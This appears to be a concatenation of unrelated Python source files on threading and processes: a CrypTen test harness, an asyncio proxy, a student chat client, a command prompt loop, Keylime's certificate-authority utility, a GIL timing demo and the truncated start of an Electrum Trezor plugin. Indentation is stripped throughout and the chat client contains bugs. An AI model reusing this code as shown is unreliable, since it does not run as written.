if dist.is_initialized():
# Broadcast this tensor to the world so that the generated random tensor
# is in sync in all distributed processes. See T45688819 for more
# information.
comm.get().broadcast(linear.weight, 0)
comm.get().broadcast(linear.bias, 0)
return linear
class MultiProcessTestCase(unittest.TestCase):
MAIN_PROCESS_RANK = -1
DEFAULT_DEVICE = "cpu"
@property
def world_size(self):
return 2
@staticmethod
def join_or_run(fn):
@wraps(fn)
def wrapper(self):
if self.rank == self.MAIN_PROCESS_RANK:
self._join_processes(fn)
else:
fn(self)
return wrapper
# The main process spawns N subprocesses that run the test.
# This function patches overwrites every test function to either
# assume the role of the main process and join its subprocesses,
# or run the underlying test function.
@classmethod
def setUpClass(cls):
for attr in dir(cls):
if attr.startswith("test"):
fn = getattr(cls, attr)
setattr(cls, attr, cls.join_or_run(fn))
def __init__(self, methodName):
super().__init__(methodName)
self.device = torch.device(self.DEFAULT_DEVICE)
self.rank = self.MAIN_PROCESS_RANK
self.mp_context = multiprocessing.get_context("spawn")
def setUp(self):
super(MultiProcessTestCase, self).setUp()
crypten.debug.configure_logging()
self.default_tolerance = 0.5
self.queue = self.mp_context.Queue()
# This gets called in the children process as well to give subclasses a
# chance to initialize themselves in the new process
if self.rank == self.MAIN_PROCESS_RANK:
self.file = tempfile.NamedTemporaryFile(delete=True).name
self.processes = [
self._spawn_process(rank) for rank in range(int(self.world_size))
]
if crypten.mpc.ttp_required():
self.processes += [self._spawn_ttp()]
def tearDown(self):
super(MultiProcessTestCase, self).tearDown()
for p in self.processes:
p.terminate()
def _current_test_name(self):
# self.id() == e.g. '__main__.TestDistributed.TestAdditive.test_get_rank'
return self.id().split(".")[-1]
def _spawn_ttp(self):
communicator_args = {
"WORLD_SIZE": self.world_size,
"RANK": self.world_size,
"RENDEZVOUS": "file://%s" % self.file,
"BACKEND": "gloo",
}
for key, val in communicator_args.items():
os.environ[key] = str(val)
process = self.mp_context.Process(
target=crypten.mpc.provider.TTPServer, name="TTP", args=()
)
process.start()
return process
def _spawn_process(self, rank):
name = "Process " + str(rank)
test_name = self._current_test_name()
process = self.mp_context.Process(
target=self.__class__._run,
name=name,
args=(test_name, rank, self.file, self.queue),
)
process.start()
return process
@classmethod
def _run(cls, test_name, rank, file, exception_queue):
self = cls(test_name)
self.file = file
self.rank = int(rank)
# set environment variables:
communicator_args = {
"WORLD_SIZE": self.world_size,
"RANK": self.rank,
"RENDEZVOUS": "file://%s" % self.file,
"BACKEND": "gloo",
}
for key, val in communicator_args.items():
os.environ[key] = str(val)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
crypten.init()
self.setUp()
# We're retrieving a corresponding test and executing it.
try:
getattr(self, test_name)()
exception_queue.put(None)
except BaseException:
tb_string = traceback.format_exc()
exception_queue.put(tb_string)
crypten.uninit()
sys.exit(0)
def _join_processes(self, fn):
exceptions = {}
for p in self.processes:
p.join()
if not self.queue.empty():
tb = self.queue.get()
if tb is not None:
exceptions[p.name] = tb
test_name = str(self.__class__).split("'")[1]
test_name += f".{self._current_test_name()}"
msg = f"\n\n\n~ Test {test_name} failed ~"
msg += "\n===========\nExceptions:\n===========\n"
for name, tb in exceptions.items():
msg += f"** {name} ** :\n{tb}\n"
self.assertEqual(len(exceptions), 0, msg)
|
proxy.py
|
#! /usr/bin/env python3.6
import asyncio
import contextlib
import logging
import threading
import time
# Singleton class where class variables will only be instantiated once.
class Proxy:
# Class variable
_host: str = None
_port: int = None
_loop: asyncio.AbstractEventLoop = None
_queue: asyncio.Queue = None
_thread: threading.Thread = None
@staticmethod
async def worker() -> None:
""" This forever-running worker needs to be handled when exiting asyncio loop. """
while True:
logging.debug(f'worker running...')
logging.debug(f'queue size: {Proxy._queue.qsize()}')
msg = await Proxy._queue.get()
# time.sleep(0.5)
logging.info(f'msg processed: {msg}')
Proxy._queue.task_done()
@staticmethod
def background_loop() -> None:
""" Main function in new thread. """
asyncio.set_event_loop(Proxy._loop)
logging.debug(f'background loop running in child thread, thread id: {threading.get_ident()}')
asyncio.ensure_future(Proxy.worker())
# loop runs forever
Proxy._loop.run_forever()
def __new__(self):
if not hasattr(self, 'instance'):
logging.debug(f'Creating Proxy from thread: {threading.get_ident()}')
Proxy._loop = asyncio.new_event_loop() if not Proxy._loop else Proxy._loop
Proxy._queue = asyncio.Queue(loop=Proxy._loop) \
if not Proxy._queue else Proxy._queue
Proxy._thread = threading.Thread(target=Proxy.background_loop) \
if not Proxy._thread else Proxy._thread
self.instance = super().__new__(self)
else:
logging.debug(f'Proxy is already created; no action done.')
return self.instance
def __init__(self, host: str='127.0.0.1',
port: int=1688,
debug: bool=False) -> None:
Proxy._host = host if not Proxy._host else Proxy._host
Proxy._port = port if not Proxy._port else Proxy._port
@staticmethod
def _send(data: str) -> None:
logging.debug(f'Sending data in child thread: {threading.get_ident()}')
Proxy._queue.put_nowait(data)
@staticmethod
def send(data: str) -> None:
if not Proxy._loop.is_running():
logging.debug('Starting thread.')
Proxy._thread.start()
logging.debug('Sending data from main thread in unblocking fashion.')
Proxy._loop.call_soon_threadsafe(Proxy._send, data)
@staticmethod
async def exit() -> None:
""" Stop the loop gracefully. """
# Wait until all messages in queue are processed
logging.debug(f'Waiting for queue to join.')
await Proxy._queue.join()
for task in asyncio.Task.all_tasks(loop=Proxy._loop):
task.cancel()
with contextlib.suppress(asyncio.CancelledError):
logging.debug(f'task: {task}')
await task
logging.debug('Stop loop')
Proxy._loop.stop()
@staticmethod
def stop() -> None:
if Proxy._loop.is_running():
logging.debug(f'Terminating new thread and loop from thread: {threading.get_ident()}')
logging.debug(f'loop: {Proxy._loop}')
asyncio.run_coroutine_threadsafe(Proxy.exit(), loop=Proxy._loop)
Proxy._thread.join()
logging.debug('All done.')
if __name__ == "__main__":
logging.basicConfig(format='%(asctime)s [%(levelname)s]: %(message)s', level=logging.DEBUG)
logging.addLevelName(logging.DEBUG, "\033[0;32m%s\033[0m" % logging.getLevelName(logging.DEBUG))
logging.debug(f'Main thread id: {threading.get_ident()}')
pro1 = Proxy()
pro2 = Proxy()
for index in range(10):
pro1.send(f'Proxy1 says hello with index: {index}')
pro2.send(f'Proxy2 says hello with index: {index}')
# time.sleep(3)
# Proxy.stop()
pro1.stop()
pro2.stop()
|
testclient.py
|
# Python 3
# Usage: python3 UDPClient3.py localhost 12000
# coding: utf-8
import sys
from socket import *
import threading
import time
import datetime as dt
# The argument of client
servername = sys.argv[1]
serverPort = sys.argv[2]
udpPort = sys.argv[3]
serverPort = int(serverPort)
# Create the TCP socket
clientSocket = socket(AF_INET, SOCK_STREAM)
clientSocket.connect((servername, serverPort))
# Create the UDP socket
hostname = socket.gethostname()
local_ip = socket.gethostbyname(hostname)
portnum = int(udpPort)
udpsock = socket(AF_INET, SOCK_DGRAM)
udpsock.bind((local_ip, udpPort))
# Start a thread for UDP transfer
def udprec():
while (True):
# We receive the filename first
l, addr = udpsock.recvfrom(1024)
# Save the filename if file name is not defined
filename = ''
if not filename:
filename = l.decode('utf-8')
l = ''
# Next the
while (l):
f = open(filename, a)
f.write(l)
f.close()
l, addr = udpsock.recvfrom(1024)
thread = threading.Thread(target=udprec)
thread.start()
# This is the authentication function
# It process the reply info comes from the server
def authenticate():
while True:
receivedMessage = clientSocket.recv(2048)
receivedMessage = receivedMessage.decode('utf-8')
if receivedMessage == "Username\r\n":
message = input("Username: ")
clientSocket.send(message.encode('utf-8'))
elif receivedMessage == "Password\r\n":
message = input("Password: ")
clientSocket.send(message.encode('utf-8'))
elif receivedMessage == "Invalid Password\r\n":
print("Invalid Password. Please try again\n")
message = input("Password: ")
clientSocket.send(message.encode('utf-8'))
# If return False, it means you are locked.
elif receivedMessage == "Locked\r\n":
print("Invalid Password. Your account has been blocked. Please try again later\n")
return False
elif receivedMessage == "Still locked\r\n":
print("Your account is blocked due to multiple login failures. Please try again later\n")
return False
elif receivedMessage == "Login Success\r\n":
clientSocket.send(udpPort.encode('utf-8'))
return True
# Respond to message sent by the dlt function in server
def msg(word):
# print(clientSocket)
confirm = clientSocket.recv(2048).decode('utf-8')
confirm = confirm.split()
time = ' '.join(confirm[1::])
message = 'Message ' + '#' + confirm[0] + ' ' + 'posted at ' + time + '.\n'
print(message)
# Respond to message sent by the dlt function in server
def dlt(infor):
infor = infor.split()
info = infor[0]
if info == 'Seq':
print('The sequence number you provided is invalid\n')
elif info == 'User':
print('You do not have the authority to delete this message\n')
elif info == 'Timestamp':
print('The timestamp you provided does not match the log. Please check\n')
elif info == 'Delete':
time = ' '.join(infor[1::])
print('The deletion at ' + time + ' is successful\n')
# Respond to message sent by the dlt function in server
def edt(infor):
infor = infor.split()
info = infor[0]
if info == 'Seq':
print('The sequence number you provided is invalid\n')
elif info == 'User':
print('You do not have the authority to delete this message\n')
elif info == 'Timestamp':
print('The timestamp you provided does not match the log. Please check\n')
elif info == 'Edit':
print("enter\n")
time = ' '.join(infor[1::])
print('The Edit operation at ' + time + ' is successful\n')
def upd():
pass
# The authenticate function will retrun true or false
# If true, the welcome message will print
ifloged = authenticate()
while ifloged:
print("Welcome to TOOM!")
allcommand = input("Enter one of the following commands (MSG, DLT, EDT, RDM, ATU, OUT, UPD):")
command = allcommand[0:3]
if command == 'MSG':
# Check the usage of this command
if allcommand == 'MSG':
print("Error! Need message after MSG command\n")
else:
clientSocket.send(allcommand.encode('utf-8'))
msg(allcommand[4::])
elif command == 'DLT':
# We need to check the usage of DLT
if allcommand == 'DLT':
print("Error! Need seq number and timestamp after DLT command\n")
else:
clientSocket.send(allcommand.encode('utf-8'))
info = allcommand[4::]
lists = info.split()
if len(lists) <= 2:
print("Error! Need seq number and timestamp after DLT command\n")
else:
recev = clientSocket.recv(2048).decode('utf-8')
dlt(recev)
elif command == 'EDT':
if allcommand == 'EDT':
print("Error! Need seq number, timestamp, and modified message after EDT command\n")
else:
info = allcommand[4::]
lists = info.split()
if len(lists) <= 2:
print("Error! Need seq number, timestamp, and modified message after EDT command\n")
else:
clientSocket.send(allcommand.encode('utf-8'))
recev = clientSocket.recv(2048).decode('utf-8')
edt(recev)
elif command == 'RDM':
if allcommand == 'RDM':
print("Error! Need timestamp after EDT command\n")
else:
info = allcommand[4::]
clientSocket.send(allcommand.encode('utf-8'))
recev = clientSocket.recv(2048).decode('utf-8')
print(recev)
elif command == 'ATU':
if allcommand == command:
clientSocket.send('ATU'.encode('utf-8'))
print('The active user list returned: \n')
info = clientSocket.recv(2048).decode('utf-8')
else:
print("Error! ATU command does not take any argument.\n")
elif command == 'UPD':
if allcommand == 'UPD':
print("Error! Need filename and username after MSG command\n")
else:
info = allcommand[4::]
info = info.split()
# The username and filename
recevname = info[0]
file = info[-1]
# The new filename
filename = '_'.join(info)
# Need to check if the username if online
clientSocket.send(recevname.encode('utf-8'))
msg = clientSocket.recv(1024).decode('utf-8')
# If offline, then print offline
if msg == 'Offline':
print(recevname +' is offline\n')
else:
# First we send the filename to the audience
udpsock.sendto(filename.encode('utf-8'), (msg[0], int(msg[1])))
msg = msg.split()
f = open(file, 'rb')
line = f.read(1024)
while (line):
udpsock.sendto(line, (msg[0], msg[1]))
line = f.read(1024)
udpsock.close()
elif command == 'OUT':
if allcommand == command:
clientSocket.send('OUT'.encode('utf-8'))
info = clientSocket.recv(2048).decode('utf-8')
print("Thank you for using. You have logged out.\n")
break
else:
print("Error! OUT command does not take any argument.\n")
else:
print("This command is invalid. Please try again with either one of MSG, DLT, EDT, RDM, ATU, OUT and UPD\n")
clientSocket.close()
|
main.py
|
import cmd, threading, queue
from typing import List
from .Component import Component
from .interface import execute as execute_interface, commands
from ..data.DictList import DictList
from ..utility.Logger import Logger
from ..utility.exception import exception
from ..utility.process import finalize
class _Main:
request = queue.Queue()
response = queue.Queue()
def main(components: List[Component] = list()):
# _Main.components.extend(components)
objects = [component() for component in components]
for component in objects:
component.initialize()
threading.Thread(target=_Prompt().cmdloop).start()
while True:
command, args, kwargs = _Main.request.get()
if command == "exit":
_Main.response.put("exit")
break
else:
try:
res = execute_interface(command, *args, **kwargs)
except Exception:
exception()
res = "error: exception"
_Main.response.put(res)
for component in objects:
component.finalize()
finalize()
def execute(command: str, *args, **kwargs):
_Main.request.put((command, args, kwargs))
return _Main.response.get()
class _Prompt(cmd.Cmd):
prompt = f" ] "
def preloop(self):
self.INFO = Logger("main").INFO
self.commands()
self.INFO(f"- help: print commands")
self.INFO(f"- exit: quit the prompt")
def precmd(self, args):
inputs = args.split()
if len(inputs) == 1 and inputs[0] == "exit":
return execute("exit")
elif len(inputs) == 1 and inputs[0] == "help":
self.commands()
return ""
elif len(inputs) > 0:
res = execute(inputs[0], *inputs[1:])
if isinstance(res, DictList):
self.INFO(f"{' '.join(inputs)} =")
res.print(print=self.INFO)
else:
self.INFO(f"{' '.join(inputs)} = {res}")
return ""
return ""
def commands(self):
self.INFO(f"commands:")
for command in commands():
self.INFO(f"- {command}")
def do_exit(self, _):
return True
|
ca_util.py
|
#!/usr/bin/python3
'''
SPDX-License-Identifier: Apache-2.0
Copyright 2017 Massachusetts Institute of Technology.
Tools for creating a CA cert and signed server certs.
Divined from http://svn.osafoundation.org/m2crypto/trunk/tests/test_x509.py
The mk_temporary_xxx calls return a NamedTemporaryFile with certs.
Usage ;
# Create a temporary CA cert and it's private key
cacert, cakey = mk_temporary_cacert()
# Create a temporary server cert+key, signed by the CA
server_cert = mk_temporary_cert(cacert.name, cakey.name, '*.server.co.uk')
protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
'''
import sys
import os
import base64
import argparse
import datetime
import getpass
import glob
import zipfile
import io
import socket
import threading
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
import time
import yaml
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
from cryptography import exceptions as crypto_exceptions
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import padding
from keylime import cmd_exec
from keylime import config
from keylime import crypto
from keylime import fs_util
from keylime import json
from keylime import revocation_notifier
from keylime import keylime_logging
logger = keylime_logging.init_logging('ca-util')
if config.CA_IMPL == 'cfssl':
from keylime import ca_impl_cfssl as ca_impl
elif config.CA_IMPL == 'openssl':
from keylime import ca_impl_openssl as ca_impl
else:
raise Exception("Unknown CA implementation: %s" % config.CA_IMPL)
global_password = None
def load_cert_by_path(cert_path):
cert = None
with open(cert_path, 'rb') as ca_file:
cert = x509.load_pem_x509_certificate(
data=ca_file.read(),
backend=default_backend(),
)
return cert
def setpassword(pw):
global global_password
if len(pw) == 0:
raise Exception("You must specify a password!")
global_password = pw
def cmd_mkcert(workingdir, name):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
cacert = load_cert_by_path('cacert.crt')
ca_pk = serialization.load_pem_private_key(
priv[0]['ca'],
password=None,
backend=default_backend()
)
cert, pk = ca_impl.mk_signed_cert(
cacert, ca_pk, name, priv[0]['lastserial'] + 1)
with open('%s-cert.crt' % name, 'wb') as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
priv[0][name] = pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# increment serial number after successful creation
priv[0]['lastserial'] += 1
write_private(priv)
with os.fdopen(os.open("%s-private.pem" % name, os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(priv[0][name])
with os.fdopen(os.open("%s-public.pem" % name, os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
cc = load_cert_by_path('%s-cert.crt' % name)
pubkey = cacert.public_key()
pubkey.verify(
cc.signature,
cc.tbs_certificate_bytes,
padding.PKCS1v15(),
cc.signature_hash_algorithm,
)
logger.info("Created certificate for name %s successfully in %s", name, workingdir)
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not validate against CA")
finally:
os.chdir(cwd)
def cmd_init(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
rmfiles("*.pem")
rmfiles("*.crt")
rmfiles("*.zip")
rmfiles("*.der")
rmfiles("private.yml")
cacert, ca_pk, _ = ca_impl.mk_cacert() # pylint: disable=W0632
priv = read_private()
# write out keys
with open('cacert.crt', 'wb') as f:
f.write(cacert.public_bytes(serialization.Encoding.PEM))
priv[0]['ca'] = ca_pk.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.PKCS8,
encryption_algorithm=serialization.NoEncryption(),
)
# store the last serial number created.
# the CA is always serial # 1
priv[0]['lastserial'] = 1
write_private(priv)
with os.fdopen(os.open("ca-public.pem", os.O_WRONLY | os.O_CREAT, 0o600), 'wb') as f:
f.write(ca_pk.public_key().public_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PublicFormat.SubjectPublicKeyInfo
))
# generate an empty crl
cacert_str = cacert.public_bytes(serialization.Encoding.PEM).decode()
crl = ca_impl.gencrl([], cacert_str, priv[0]['ca'].decode())
if isinstance(crl, str):
crl = crl.encode('utf-8')
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
# Sanity checks...
cac = load_cert_by_path('cacert.crt')
pubkey = cacert.public_key()
pubkey.verify(
cac.signature,
cac.tbs_certificate_bytes,
padding.PKCS1v15(),
cac.signature_hash_algorithm,
)
logger.info("CA certificate created successfully in %s", workingdir)
except crypto_exceptions.InvalidSignature:
logger.error("ERROR: Cert does not self validate")
finally:
os.chdir(cwd)
def cmd_certpkg(workingdir, name, insecure=False):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# zip up the crt, private key, and public key
with open('cacert.crt', 'rb') as f:
cacert = f.read()
with open(f"{name}-public.pem", 'rb') as f:
pub = f.read()
with open(f"{name}-cert.crt", 'rb') as f:
cert = f.read()
with open('cacrl.der', 'rb') as f:
crl = f.read()
with open('cacrl.pem', 'rb') as f:
crlpem = f.read()
cert_obj = x509.load_pem_x509_certificate(
data=cert,
backend=default_backend(),
)
serial = cert_obj.serial_number
subject = cert_obj.subject.rfc4514_string()
priv = read_private()
private = priv[0][name]
with open(f"{name}-private.pem", 'rb') as f:
prot_priv = f.read()
# no compression to avoid extraction errors in tmpfs
sf = io.BytesIO()
with zipfile.ZipFile(sf, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", private)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
pkg = sf.getvalue()
if insecure:
logger.warning(
"Unprotected private keys in cert package being written to disk")
with open(f'{name}-pkg.zip', 'wb') as f:
f.write(pkg)
else:
# actually output the package to disk with a protected private key
with zipfile.ZipFile('%s-pkg.zip' % name, 'w', compression=zipfile.ZIP_STORED) as f:
f.writestr(f"{name}-public.pem", pub)
f.writestr(f"{name}-cert.crt", cert)
f.writestr(f"{name}-private.pem", prot_priv)
f.writestr('cacert.crt', cacert)
f.writestr('cacrl.der', crl)
f.writestr('cacrl.pem', crlpem)
logger.info("Creating cert package for %s in %s-pkg.zip",
name, name)
return pkg, serial, subject
finally:
os.chdir(cwd)
def convert_crl_to_pem(derfile, pemfile):
if config.get('general', 'ca_implementation') == 'openssl':
with open(pemfile, 'w', encoding="utf-8") as f:
f.write("")
else:
cmd = ('openssl', 'crl', '-in', derfile, '-inform', 'der',
'-out', pemfile)
cmd_exec.run(cmd)
def get_crl_distpoint(cert_path):
cert_obj = load_cert_by_path(cert_path)
try:
crl_distpoints = cert_obj.extensions.get_extension_for_class(x509.CRLDistributionPoints).value
for dstpnt in crl_distpoints:
for point in dstpnt.full_name:
if isinstance(point, x509.general_name.UniformResourceIdentifier):
return point.value
except x509.extensions.ExtensionNotFound:
pass
logger.info("No CRL distribution points in %s", cert_path)
return ""
# to check: openssl crl -inform DER -text -noout -in cacrl.der
def cmd_revoke(workingdir, name=None, serial=None):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
if name is not None and serial is not None:
raise Exception(
"You may not specify a cert and a serial at the same time")
if name is None and serial is None:
raise Exception("You must specify a cert or a serial to revoke")
if name is not None:
# load up the cert
cert = load_cert_by_path(f'{name}-cert.crt')
serial = cert.serial_number
# convert serial to string
serial = str(serial)
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode('utf-8')
if serial not in priv[0]['revoked_keys']:
priv[0]['revoked_keys'].append(serial)
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
if os.stat('cacrl.der').st_size:
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
# regenerate the crl without revoking anything
def cmd_regencrl(workingdir):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
priv = read_private()
# get the ca key cert and keys as strings
with open('cacert.crt', encoding="utf-8") as f:
cacert = f.read()
ca_pk = priv[0]['ca'].decode()
crl = ca_impl.gencrl(priv[0]['revoked_keys'], cacert, ca_pk)
write_private(priv)
# write out the CRL to the disk
with open('cacrl.der', 'wb') as f:
f.write(crl)
convert_crl_to_pem("cacrl.der", "cacrl.pem")
finally:
os.chdir(cwd)
return crl
def cmd_listen(workingdir, cert_path):
cwd = os.getcwd()
try:
fs_util.ch_dir(workingdir)
# just load up the password for later
read_private(True)
serveraddr = ('', config.CRL_PORT)
server = ThreadedCRLServer(serveraddr, CRLHandler)
if os.path.exists('cacrl.der'):
logger.info("Loading existing crl: %s",
os.path.abspath("cacrl.der"))
with open('cacrl.der', 'rb') as f:
server.setcrl(f.read())
t = threading.Thread(target=server.serve_forever)
logger.info("Hosting CRL on %s:%d",
socket.getfqdn(), config.CRL_PORT)
t.start()
def check_expiration():
logger.info("checking CRL for expiration every hour")
while True: # pylint: disable=R1702
try:
if (os.path.exists('cacrl.der') and
os.stat('cacrl.der').st_size):
cmd = ('openssl', 'crl', '-inform', 'der', '-in',
'cacrl.der', '-text', '-noout')
retout = cmd_exec.run(cmd)['retout']
for line in retout:
line = line.strip()
if line.startswith(b"Next Update:"):
expire = datetime.datetime.strptime(
line[13:].decode('utf-8'), "%b %d %H:%M:%S %Y %Z")
# check expiration within 6 hours
in1hour = datetime.datetime.utcnow() + datetime.timedelta(hours=6)
if expire <= in1hour:
logger.info(
"Certificate to expire soon %s, re-issuing", expire)
cmd_regencrl(workingdir)
# check a little less than every hour
time.sleep(3540)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
# server.shutdown()
break
t2 = threading.Thread(target=check_expiration)
t2.setDaemon(True)
t2.start()
def revoke_callback(revocation):
json_meta = json.loads(revocation['meta_data'])
serial = json_meta['cert_serial']
if revocation.get('type', None) != 'revocation' or serial is None:
logger.error("Unsupported revocation message: %s", revocation)
return
logger.info("Revoking certificate: %s", serial)
server.setcrl(cmd_revoke(workingdir, None, serial))
try:
while True:
try:
revocation_notifier.await_notifications(
revoke_callback, revocation_cert_path=cert_path)
except Exception as e:
logger.exception(e)
logger.warning(
"No connection to revocation server, retrying in 10s...")
time.sleep(10)
except KeyboardInterrupt:
logger.info("TERM Signal received, shutting down...")
server.shutdown()
sys.exit()
finally:
os.chdir(cwd)
class ThreadedCRLServer(ThreadingMixIn, HTTPServer):
published_crl = None
def setcrl(self, crl):
self.published_crl = crl
class CRLHandler(BaseHTTPRequestHandler):
def do_GET(self):
logger.info('GET invoked from %s with uri: %s', str(self.client_address), self.path)
if self.server.published_crl is None:
self.send_response(404)
self.end_headers()
else:
# send back the CRL
self.send_response(200)
self.end_headers()
self.wfile.write(self.server.published_crl)
def rmfiles(path):
files = glob.glob(path)
for f in files:
os.remove(f)
def write_private(inp):
priv = inp[0]
salt = inp[1]
global global_password
priv_encoded = yaml.dump(priv, Dumper=SafeDumper)
key = crypto.kdf(global_password, salt)
ciphertext = crypto.encrypt(priv_encoded, key)
towrite = {'salt': salt, 'priv': ciphertext}
with os.fdopen(os.open('private.yml', os.O_WRONLY | os.O_CREAT, 0o600), 'w', encoding="utf-8") as f:
yaml.dump(towrite, f, Dumper=SafeDumper)
def read_private(warn=False):
global global_password
if global_password is None:
setpassword(getpass.getpass(
"Please enter the password to decrypt your keystore: "))
if os.path.exists('private.yml'):
with open('private.yml', encoding="utf-8") as f:
toread = yaml.load(f, Loader=SafeLoader)
key = crypto.kdf(global_password, toread['salt'])
try:
plain = crypto.decrypt(toread['priv'], key)
except ValueError as e:
raise Exception("Invalid password for keystore") from e
return yaml.load(plain, Loader=SafeLoader), toread['salt']
if warn:
# file doesn't exist, just invent a salt
logger.warning("Private certificate data %s does not exist yet.",
os.path.abspath("private.yml"))
logger.warning(
"Keylime will attempt to load private certificate data again when it is needed.")
return {'revoked_keys': []}, base64.b64encode(crypto.generate_random_key()).decode()
def main(argv=sys.argv):
parser = argparse.ArgumentParser(argv[0])
parser.add_argument('-c', '--command', action='store', dest='command',
required=True, help="valid commands are init,create,pkg,revoke,listen")
parser.add_argument('-n', '--name', action='store',
help='the common name of the certificate to create')
parser.add_argument('-d', '--dir', action='store',
help='use a custom directory to store certificates and keys')
parser.add_argument('-i', '--insecure', action='store_true', default=False,
help='create cert packages with unprotected private keys and write them to disk. USE WITH CAUTION!')
args = parser.parse_args(argv[1:])
if args.dir is None:
if os.getuid() != 0 and config.REQUIRE_ROOT:
logger.error(
"If you don't specify a working directory, this process must be run as root to access %s", config.WORK_DIR)
sys.exit(-1)
workingdir = config.CA_WORK_DIR
else:
workingdir = args.dir
# set a conservative general umask
os.umask(0o077)
if args.command == 'init':
cmd_init(workingdir)
elif args.command == 'create':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_mkcert(workingdir, args.name)
elif args.command == 'pkg':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_certpkg(workingdir, args.name, args.insecure)
elif args.command == 'revoke':
if args.name is None:
logger.error(
"you must pass in a name for the certificate using -n (or --name)")
parser.print_help()
sys.exit(-1)
cmd_revoke(workingdir, args.name)
elif args.command == 'listen':
if args.name is None:
args.name = os.path.join(workingdir, 'RevocationNotifier-cert.crt')
logger.warning("using default name for revocation cert %s",
args.name)
cmd_listen(workingdir, args.name)
else:
logger.error("Invalid command: %s", args.command)
parser.print_help()
sys.exit(-1)
|
example2.py
|
import time
import threading
COUNT = 50000000
def countdown(n):
while n > 0:
n -= 1
###########################################################################
start = time.time()
countdown(COUNT)
print('Sequential program finished.')
print(f'Took {time.time() - start : .2f} seconds.')
###########################################################################
thread1 = threading.Thread(target=countdown, args=(COUNT // 2,))
thread2 = threading.Thread(target=countdown, args=(COUNT // 2,))
start = time.time()
thread1.start()
thread2.start()
thread1.join()
thread2.join()
print('Concurrent program finished.')
print(f'Took {time.time() - start : .2f} seconds.')
|
trezor.py
|
import traceback
import sys
from typing import NamedTuple, Any
from electrum_sum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_sum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_sum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum_sum import constants
from electrum_sum.i18n import _
from electrum_sum.plugin import Device
from electrum_sum.transaction import deserialize, Transaction
from electrum_sum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_sum.base_wizard import ScriptTypeNotSupported, HWD_SETUP_NEW_WALLET
from electrum_sum.logging import get_logger
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
LibraryFoundButUnusable, OutdatedHwFirmwareException)
_logger = get_logger(__name__)
try:
import trezorlib
import trezorlib.transport
from trezorlib.transport.bridge import BridgeTransport, call_bridge
from .clientbase import TrezorClientBase
from trezorlib.messages import (
RecoveryDeviceType, HDNodeType, HDNodePathType,
InputScriptType, OutputScriptType, MultisigRedeemScriptType,
TxInputType, TxOutputType, TxOutputBinType, TransactionType, SignTx)
RECOVERY_TYPE_SCRAMBLED_WORDS = RecoveryDeviceType.ScrambledWords
RECOVERY_TYPE_MATRIX = RecoveryDeviceType.Matrix
TREZORLIB = True
except Exception as e:
_logger.exception('error importing trezorlib')
TREZORLIB = False
RECOVERY_TYPE_SCRAMBLED_WORDS, RECOVERY_TYPE_MATRIX = range(2)
# Trezor initialization methods
TIM_NEW, TIM_RECOVER = range(2)
TREZOR_PRODUCT_KEY = 'Trezor'
class TrezorKeyStore(Hardware_KeyStore):
hw_type = 'trezor'
device = TREZOR_PRODUCT_KEY
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
msg_sig = client.sign_message(address_path, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
